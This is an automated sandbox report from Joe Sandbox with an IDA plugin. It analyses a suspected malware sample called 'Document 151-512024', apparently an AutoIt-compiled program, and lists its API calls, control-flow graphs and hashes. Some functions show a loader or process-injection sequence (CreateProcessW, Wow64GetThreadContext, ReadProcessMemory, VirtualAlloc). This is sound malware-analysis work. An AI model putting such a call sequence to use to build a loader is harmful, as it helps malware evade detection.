                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                    • String ID: H
                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                    • Opcode ID: cd0611830c88976a69be8c3277113469f63b3178d64ae334e7341df1d19cf8b0
                                                                                                    • Instruction ID: dbcc54237f42cb4ed7e3a251cd0224926deedc596f35680c8648088b1ed5b982
                                                                                                    • Opcode Fuzzy Hash: cd0611830c88976a69be8c3277113469f63b3178d64ae334e7341df1d19cf8b0
                                                                                                    • Instruction Fuzzy Hash: F4A15632A041048FDF19EFA8DC62BAE7BA4EB86320F14415EF8159B391DB319C57CB91

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00943A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A11418,?,00942E7F,?,?,?,00000000), ref: 00943A78
                                                                                                      • Part of subcall function 00943357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00943379
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0094356A
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0098318D
                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009831CE
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00983210
                                                                                                    • _wcslen.LIBCMT ref: 00983277
                                                                                                    • _wcslen.LIBCMT ref: 00983286
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                    • API String ID: 98802146-2727554177
                                                                                                    • Opcode ID: a23464aa2f601c78a1d4bf9c6acb44d6086fc07405d9584a8adb905d432b02e5
                                                                                                    • Instruction ID: 33321b4252e80e3a27f41ff46df5d6392929360bcbee04de36725d379aebc96e
                                                                                                    • Opcode Fuzzy Hash: a23464aa2f601c78a1d4bf9c6acb44d6086fc07405d9584a8adb905d432b02e5
                                                                                                    • Instruction Fuzzy Hash: 2E718D714483019EC714EFA9DC82E9BBBE8FF85740F40882EF5558B261DB34DA59CB52

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00942B8E
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00942B9D
                                                                                                    • LoadIconW.USER32(00000063), ref: 00942BB3
                                                                                                    • LoadIconW.USER32(000000A4), ref: 00942BC5
                                                                                                    • LoadIconW.USER32(000000A2), ref: 00942BD7
                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00942BEF
                                                                                                    • RegisterClassExW.USER32(?), ref: 00942C40
                                                                                                      • Part of subcall function 00942CD4: GetSysColorBrush.USER32(0000000F), ref: 00942D07
                                                                                                      • Part of subcall function 00942CD4: RegisterClassExW.USER32(00000030), ref: 00942D31
                                                                                                      • Part of subcall function 00942CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00942D42
                                                                                                      • Part of subcall function 00942CD4: InitCommonControlsEx.COMCTL32(?), ref: 00942D5F
                                                                                                      • Part of subcall function 00942CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00942D6F
                                                                                                      • Part of subcall function 00942CD4: LoadIconW.USER32(000000A9), ref: 00942D85
                                                                                                      • Part of subcall function 00942CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00942D94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                    • API String ID: 423443420-4155596026
                                                                                                    • Opcode ID: 38943c6c44e9e71b5b1bf66a1c59a7c06a0bd13aa1e05da622ad5e65402c435a
                                                                                                    • Instruction ID: b44dac4ed9422efc30e09dddb49fb48ecfc790b3ec7e66d906117e13a83c2d19
                                                                                                    • Opcode Fuzzy Hash: 38943c6c44e9e71b5b1bf66a1c59a7c06a0bd13aa1e05da622ad5e65402c435a
                                                                                                    • Instruction Fuzzy Hash: 73214CB0E52314ABDB50DFE5EC59BD9BFB4FB48B54F00801AF610AA6A4D3B10541DF90

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 443 943170-943185 444 9431e5-9431e7 443->444 445 943187-94318a 443->445 444->445 446 9431e9 444->446 447 94318c-943193 445->447 448 9431eb 445->448 449 9431d0-9431d8 DefWindowProcW 446->449 452 943265-94326d PostQuitMessage 447->452 453 943199-94319e 447->453 450 982dfb-982e23 call 9418e2 call 95e499 448->450 451 9431f1-9431f6 448->451 454 9431de-9431e4 449->454 487 982e28-982e2f 450->487 456 94321d-943244 SetTimer RegisterWindowMessageW 451->456 457 9431f8-9431fb 451->457 455 943219-94321b 452->455 459 9431a4-9431a8 453->459 460 982e7c-982e90 call 9abf30 453->460 455->454 456->455 464 943246-943251 CreatePopupMenu I_RpcFreeBuffer 456->464 461 982d9c-982d9f 457->461 462 943201-943214 KillTimer call 9430f2 call 943c50 457->462 465 982e68-982e77 call 9ac161 459->465 466 9431ae-9431b3 459->466 460->455 477 982e96 460->477 468 982da1-982da5 461->468 469 982dd7-982df6 MoveWindow 461->469 462->455 473 943253-943263 call 94326f 464->473 465->455 474 982e4d-982e54 466->474 475 9431b9-9431be 466->475 478 982dc6-982dd2 SetFocus 468->478 479 982da7-982daa 468->479 469->455 473->455 474->449 480 982e5a-982e63 call 9a0ad7 474->480 475->473 485 9431c4-9431ca 475->485 477->449 478->455 479->485 488 982db0-982dc1 call 9418e2 479->488 480->449 485->449 485->487 487->449 491 982e35-982e48 call 9430f2 call 943837 487->491 488->455 491->449
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0094316A,?,?), ref: 009431D8
                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0094316A,?,?), ref: 00943204
                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00943227
                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0094316A,?,?), ref: 00943232
                                                                                                    • CreatePopupMenu.USER32 ref: 00943246
                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00943267
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                    • String ID: TaskbarCreated
                                                                                                    • API String ID: 129472671-2362178303
                                                                                                    • Opcode ID: 36892af9a7f196fce29a05d4e35912a9752f1362f7d9645ded53b93bea2c86ff
                                                                                                    • Instruction ID: a00d22ba9d74decc651cd489456349df9e4bbe70bf93b7cd999e0c9a41f75d54
                                                                                                    • Opcode Fuzzy Hash: 36892af9a7f196fce29a05d4e35912a9752f1362f7d9645ded53b93bea2c86ff
                                                                                                    • Instruction Fuzzy Hash: D9415971268204ABDF146B789C4DFF93B1DE749300F04C126FA228A2A5D7B59B81D7A1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 499 978d45-978d55 500 978d57-978d6a call 96f2c6 call 96f2d9 499->500 501 978d6f-978d71 499->501 515 9790f1 500->515 502 978d77-978d7d 501->502 503 9790d9-9790e6 call 96f2c6 call 96f2d9 501->503 502->503 505 978d83-978dae 502->505 520 9790ec call 9727ec 503->520 505->503 508 978db4-978dbd 505->508 512 978dd7-978dd9 508->512 513 978dbf-978dd2 call 96f2c6 call 96f2d9 508->513 518 9790d5-9790d7 512->518 519 978ddf-978de3 512->519 513->520 521 9790f4-9790f9 515->521 518->521 519->518 523 978de9-978ded 519->523 520->515 523->513 526 978def-978e06 523->526 528 978e23-978e2c 526->528 529 978e08-978e0b 526->529 530 978e2e-978e45 call 96f2c6 call 96f2d9 call 9727ec 528->530 531 978e4a-978e54 528->531 532 978e15-978e1e 529->532 533 978e0d-978e13 529->533 563 97900c 530->563 536 978e56-978e58 531->536 537 978e5b-978e79 call 973820 call 9729c8 * 2 531->537 534 978ebf-978ed9 532->534 533->530 533->532 539 978edf-978eef 534->539 540 978fad-978fb6 call 97f89b 534->540 536->537 567 978e96-978ebc call 979424 537->567 568 978e7b-978e91 call 96f2d9 call 96f2c6 537->568 539->540 544 978ef5-978ef7 539->544 551 979029 540->551 552 978fb8-978fca 540->552 544->540 548 978efd-978f23 544->548 548->540 553 978f29-978f3c 548->553 555 97902d-979045 ReadFile 551->555 552->551 557 978fcc-978fdb GetConsoleMode 552->557 553->540 558 978f3e-978f40 553->558 561 979047-97904d 555->561 562 9790a1-9790ac GetLastError 555->562 557->551 564 978fdd-978fe1 557->564 558->540 565 978f42-978f6d 558->565 561->562 571 97904f 561->571 569 9790c5-9790c8 562->569 570 9790ae-9790c0 call 96f2d9 call 96f2c6 562->570 573 97900f-979019 call 9729c8 563->573 564->555 572 978fe3-978ffd ReadConsoleW 564->572 565->540 566 978f6f-978f82 565->566 566->540 575 978f84-978f86 566->575 567->534 568->563 582 979005-97900b call 96f2a3 569->582 583 9790ce-9790d0 569->583 570->563 579 979052-979064 571->579 580 978fff GetLastError 572->580 581 97901e-979027 572->581 573->521 575->540 585 978f88-978fa8 575->585 579->573 589 979066-97906a 579->589 580->582 581->579 582->563 583->573 585->540 593 979083-97908e 589->593 594 97906c-97907c call 978a61 589->594 599 979090 call 978bb1 593->599 600 97909a-97909f call 9788a1 593->600 606 97907f-979081 594->606 604 979095-979098 599->604 600->604 604->606 606->573
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 954be8d021fa824aae2caf09919035cb6a754c1693588d370b2f34b699c53fe9
                                                                                                    • Instruction ID: e19b02a219a0aa5bde91900605a4fd92856846bffde96ac19e6dded77693ec42
                                                                                                    • Opcode Fuzzy Hash: 954be8d021fa824aae2caf09919035cb6a754c1693588d370b2f34b699c53fe9
                                                                                                    • Instruction Fuzzy Hash: C9C1E276A04249AFCB11DFACD855BAEBBB4FF4A310F048099E518A7392C7749942CF61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 607 1bc2640-1bc26ee call 1bc0000 610 1bc26f5-1bc271b call 1bc3550 CreateFileW 607->610 613 1bc271d 610->613 614 1bc2722-1bc2732 610->614 615 1bc286d-1bc2871 613->615 621 1bc2739-1bc2753 VirtualAlloc 614->621 622 1bc2734 614->622 617 1bc28b3-1bc28b6 615->617 618 1bc2873-1bc2877 615->618 623 1bc28b9-1bc28c0 617->623 619 1bc2879-1bc287c 618->619 620 1bc2883-1bc2887 618->620 619->620 624 1bc2889-1bc2893 620->624 625 1bc2897-1bc289b 620->625 626 1bc275a-1bc2771 ReadFile 621->626 627 1bc2755 621->627 622->615 628 1bc2915-1bc292a 623->628 629 1bc28c2-1bc28cd 623->629 624->625 632 1bc289d-1bc28a7 625->632 633 1bc28ab 625->633 634 1bc2778-1bc27b8 VirtualAlloc 626->634 635 1bc2773 626->635 627->615 630 1bc292c-1bc2937 VirtualFree 628->630 631 1bc293a-1bc2942 628->631 636 1bc28cf 629->636 637 1bc28d1-1bc28dd 629->637 630->631 632->633 633->617 638 1bc27bf-1bc27da call 1bc37a0 634->638 639 1bc27ba 634->639 635->615 636->628 640 1bc28df-1bc28ef 637->640 641 1bc28f1-1bc28fd 637->641 647 1bc27e5-1bc27ef 638->647 639->615 642 1bc2913 640->642 643 1bc28ff-1bc2908 641->643 644 1bc290a-1bc2910 641->644 642->623 643->642 644->642 648 1bc27f1-1bc2820 call 1bc37a0 647->648 649 1bc2822-1bc2836 call 1bc35b0 647->649 648->647 655 1bc2838 649->655 656 1bc283a-1bc283e 649->656 655->615 657 1bc284a-1bc284e 656->657 658 1bc2840-1bc2844 FindCloseChangeNotification 656->658 659 1bc285e-1bc2867 657->659 660 1bc2850-1bc285b VirtualFree 657->660 658->657 659->610 659->615 660->659
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01BC2711
                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01BC2937
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 204039940-0
                                                                                                    • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                    • Instruction ID: a7f90e25e327b0f658c249558baa4f320eca7d87e235df4ea11c0da2981ac0d9
                                                                                                    • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                    • Instruction Fuzzy Hash: 51A10774E00209EBDB18CFA4C994BEEBBB5FF48704F20819DE615BB281D7759A41CB94

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 671 942c63-942cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00942C91
                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00942CB2
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00941CAD,?), ref: 00942CC6
                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00941CAD,?), ref: 00942CCF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateShow
                                                                                                    • String ID: AutoIt v3$edit
                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                    • Opcode ID: 1ce2ff005ed2c516985342402d66a504e6aa45483352a1936cbf20bddf9ddd80
                                                                                                    • Instruction ID: 59fd36d3e81845608e0ec6ac962d02a60ec543a71138fd0f3d733e20bd37193b
                                                                                                    • Opcode Fuzzy Hash: 1ce2ff005ed2c516985342402d66a504e6aa45483352a1936cbf20bddf9ddd80
                                                                                                    • Instruction Fuzzy Hash: 0FF03AB95802A07AEB704753AC0CEB76EBDD7C6F50B00811AFA10AA2A4C2610842DAB0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 786 1bc2410-1bc2535 call 1bc0000 call 1bc2300 CreateFileW 793 1bc253c-1bc254c 786->793 794 1bc2537 786->794 797 1bc254e 793->797 798 1bc2553-1bc256d VirtualAlloc 793->798 795 1bc25ec-1bc25f1 794->795 797->795 799 1bc256f 798->799 800 1bc2571-1bc2588 ReadFile 798->800 799->795 801 1bc258c-1bc25c6 call 1bc2340 call 1bc1300 800->801 802 1bc258a 800->802 807 1bc25c8-1bc25dd call 1bc2390 801->807 808 1bc25e2-1bc25ea ExitProcess 801->808 802->795 807->808 808->795
                                                                                                    APIs
                                                                                                      • Part of subcall function 01BC2300: Sleep.KERNELBASE(000001F4), ref: 01BC2311
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01BC252B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFileSleep
                                                                                                    • String ID: 5S2R3G3YSEK91FYPB50
                                                                                                    • API String ID: 2694422964-1853076741
                                                                                                    • Opcode ID: 8336b097b4d89c71ee4fe42e5c2ebf023997c7730ba97291b17218a55833900e
                                                                                                    • Instruction ID: ab2cc254cd6a2369fc00edc6064c85e4efa3b654900dcef966c4d6e4bcb1f17c
                                                                                                    • Opcode Fuzzy Hash: 8336b097b4d89c71ee4fe42e5c2ebf023997c7730ba97291b17218a55833900e
                                                                                                    • Instruction Fuzzy Hash: 62516D31D04249EAEF15DBA4C854BEFBB79AF18700F0041D9E609BB2C1D7B94B49CBA5

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2C05
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 009B2C87
                                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B2C9D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2CAE
                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009B2CC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$Copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3226157194-0
                                                                                                    • Opcode ID: 5f3507f76f7ce210464f8dcf1dd68ea38984beb5e544c4b783fac6da21b21009
                                                                                                    • Instruction ID: 503b7e74c3fa86c2e64289b8da60b9f336409928bbf0c325cbf32a016dde0dc9
                                                                                                    • Opcode Fuzzy Hash: 5f3507f76f7ce210464f8dcf1dd68ea38984beb5e544c4b783fac6da21b21009
                                                                                                    • Instruction Fuzzy Hash: 56B14D72D01129ABDF21DBA4CD85FDEBBBDEF89350F1040A6F609E6151EB309A448F61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 952 943b1c-943b27 953 943b99-943b9b 952->953 954 943b29-943b2e 952->954 956 943b8c-943b8f 953->956 954->953 955 943b30-943b48 RegOpenKeyExW 954->955 955->953 957 943b4a-943b69 RegQueryValueExW 955->957 958 943b80-943b8b RegCloseKey 957->958 959 943b6b-943b76 957->959 958->956 960 943b90-943b97 959->960 961 943b78-943b7a 959->961 962 943b7e 960->962 961->962 962->958
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B40
                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B61
                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00943B0F,SwapMouseButtons,00000004,?), ref: 00943B83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: Control Panel\Mouse
                                                                                                    • API String ID: 3677997916-824357125
                                                                                                    • Opcode ID: a901bd5cfd2070ea6d7657c4e5c7ae12960c096bec3606b93c99d9dcb2c33420
                                                                                                    • Instruction ID: 3254d213018419a0781fa5b1556dee47bb644efadd04bc1e62a705c8eeb5aa0a
                                                                                                    • Opcode Fuzzy Hash: a901bd5cfd2070ea6d7657c4e5c7ae12960c096bec3606b93c99d9dcb2c33420
                                                                                                    • Instruction Fuzzy Hash: 9E112AB5521209FFDF218FA5DC44EBEB7BCEF05744B10895AA805D7110E2319E44AB60
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01BC1ABB
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BC1B51
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BC1B73
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 2438371351-0
                                                                                                    • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                    • Instruction ID: 201181e1958b38c0643d63f34c30641b95760a75d96a062f86439ef5c3f7b621
                                                                                                    • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                    • Instruction Fuzzy Hash: AB620A30A14258DBEB24CFA8C850BDEB776EF58700F1091A9D20DEB391E7759E81CB59
                                                                                                    Strings
                                                                                                    • Variable must be of type 'Object'., xrefs: 009932B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                    • API String ID: 0-109567571
                                                                                                    • Opcode ID: 9100b3555a3696651c5da9ef958a004958911f55f4d30998059a5ff2201acbd9
                                                                                                    • Instruction ID: fe34520ad54dfa1e142a41952097de0a59ae85ea8e986b78c8ca7175c759601a
                                                                                                    • Opcode Fuzzy Hash: 9100b3555a3696651c5da9ef958a004958911f55f4d30998059a5ff2201acbd9
